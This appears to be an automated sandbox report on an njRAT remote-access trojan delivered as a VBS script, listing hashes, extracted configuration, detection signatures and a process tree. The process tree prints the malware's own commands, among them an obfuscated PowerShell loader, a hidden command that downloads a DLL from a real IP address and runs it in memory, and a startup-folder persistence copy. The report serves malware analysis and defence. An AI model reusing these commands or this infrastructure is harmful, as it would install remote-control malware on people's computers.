njrat | 2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108

Analysis

max time kernel
146s
max time network
139s
platform
windows10_x64
resource
win10-en-20211208
submitted
21-12-2021 18:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9fb660eca8d9ed1038a8cffc032e59bb.vbs
Size

151KB
MD5

9fb660eca8d9ed1038a8cffc032e59bb
SHA1

4aff5b55b1b499cec665f46b132856a4a300b4e9
SHA256

2a196da9c5e2dcf30d7eb90464a4296bc1f0046958836157c07ab4782e5af108
SHA512

0bcb0de54a3bdbe9d0e2be1899ab05060a7db58ae6e53aeed82a54b99f126502e0366415e590f22909aa9531c272af8287c6d5f06ece31de21156bcc2ef81790

Score

10^/10

njrat nyan cat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

revg.duckdns.org:57831

Mutex

ebef4abe57d24e8

Attributes

reg_key
ebef4abe57d24e8
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

14 3964 powershell.exe

flow	pid	process
14	3964	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3964 set thread context of 2976 3964 powershell.exe RegSvcs.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3888 PING.EXE

description	pid	process	target process
PID 3964 set thread context of 2976	3964	powershell.exe	RegSvcs.exe

pid	process
3888	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe
812	powershell.exe
812	powershell.exe
812	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe
Token: 33	2976	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2976	RegSvcs.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2668 wrote to memory of 3812	2668	WScript.exe	cmd.exe
PID 2668 wrote to memory of 3812	2668	WScript.exe	cmd.exe
PID 3812 wrote to memory of 3888	3812	cmd.exe	PING.EXE
PID 3812 wrote to memory of 3888	3812	cmd.exe	PING.EXE
PID 3812 wrote to memory of 2684	3812	cmd.exe	powershell.exe
PID 3812 wrote to memory of 2684	3812	cmd.exe	powershell.exe
PID 2668 wrote to memory of 812	2668	WScript.exe	powershell.exe
PID 2668 wrote to memory of 812	2668	WScript.exe	powershell.exe
PID 812 wrote to memory of 3964	812	powershell.exe	powershell.exe
PID 812 wrote to memory of 3964	812	powershell.exe	powershell.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe
PID 3964 wrote to memory of 2976	3964	powershell.exe	RegSvcs.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:3812

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:3888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\9fb660eca8d9ed1038a8cffc032e59bb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ OID.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4bcca567d023ce5661552f85274025e3

SHA1
1dc0aacc4a8f4e0c4f850c4bc25c73e5c55a1cc0

SHA256
e31b1409244d5e2274352f28d6bae42a5cb54a33888ad76fda5563b19adf3400

SHA512
8bbb54db28137e99de8f62b111dc09af94324f1cea2870d89db3865166fa331b9b4a5fbd07f8a1c903b87009220453c8c012971302cd0e988b2f35ca87141ca9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
abb924100aadf485792f810c186ab581

SHA1
3daf1a77e1c1114f56652616c3ec238921d15383

SHA256
4f4649d70b4881808403dc9c09d62f524a853e9cd367b2adf3baf9964fbdd613

SHA512
3ec1b32d738062461c1c788fa6db83bd0943c440e6a126ca98dc3f52cfcc032597fd502195ea18c8e70e42adea0d11c29240c7aeb84703630fe333cc9e8a0310

Download Submit
memory/812-156-0x0000023554DC0000-0x0000023554DC2000-memory.dmp

Filesize
8KB

Download
memory/812-173-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-157-0x0000023554DC3000-0x0000023554DC5000-memory.dmp

Filesize
8KB

Download
memory/812-136-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-178-0x0000023554DC6000-0x0000023554DC8000-memory.dmp

Filesize
8KB

Download
memory/812-134-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-143-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-141-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-140-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-132-0x0000000000000000-mapping.dmp

Download
memory/812-137-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/812-135-0x000002353AF80000-0x000002353AF82000-memory.dmp

Filesize
8KB

Download
memory/2684-123-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-122-0x000002102A340000-0x000002102A341000-memory.dmp

Filesize
4KB

Download
memory/2684-126-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-125-0x0000021042A70000-0x0000021042A71000-memory.dmp

Filesize
4KB

Download
memory/2684-124-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-117-0x0000000000000000-mapping.dmp

Download
memory/2684-131-0x0000021042416000-0x0000021042418000-memory.dmp

Filesize
8KB

Download
memory/2684-130-0x0000021042413000-0x0000021042415000-memory.dmp

Filesize
8KB

Download
memory/2684-129-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-118-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-119-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-128-0x0000021042410000-0x0000021042412000-memory.dmp

Filesize
8KB

Download
memory/2684-120-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2684-121-0x00000210284B0000-0x00000210284B2000-memory.dmp

Filesize
8KB

Download
memory/2976-180-0x0000000005650000-0x0000000005B4E000-memory.dmp

Filesize
5.0MB

Download
memory/2976-179-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/2976-181-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/2976-177-0x0000000005B50000-0x0000000005B51000-memory.dmp

Filesize
4KB

Download
memory/2976-176-0x00000000055B0000-0x00000000055B1000-memory.dmp

Filesize
4KB

Download
memory/2976-182-0x00000000059A0000-0x00000000059A1000-memory.dmp

Filesize
4KB

Download
memory/2976-169-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2976-170-0x000000000040676E-mapping.dmp

Download
memory/3812-115-0x0000000000000000-mapping.dmp

Download
memory/3888-116-0x0000000000000000-mapping.dmp

Download
memory/3964-145-0x0000000000000000-mapping.dmp

Download
memory/3964-167-0x00000232F3D56000-0x00000232F3D58000-memory.dmp

Filesize
8KB

Download
memory/3964-168-0x00000232F3CD0000-0x00000232F3CE6000-memory.dmp

Filesize
88KB

Download
memory/3964-166-0x00000232F3B90000-0x00000232F3B96000-memory.dmp

Filesize
24KB

Download
memory/3964-160-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-171-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-159-0x00000232F3D53000-0x00000232F3D55000-memory.dmp

Filesize
8KB

Download
memory/3964-158-0x00000232F3D50000-0x00000232F3D52000-memory.dmp

Filesize
8KB

Download
memory/3964-154-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-153-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-151-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-149-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-148-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-147-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download
memory/3964-146-0x00000232F1D50000-0x00000232F1D52000-memory.dmp

Filesize
8KB

Download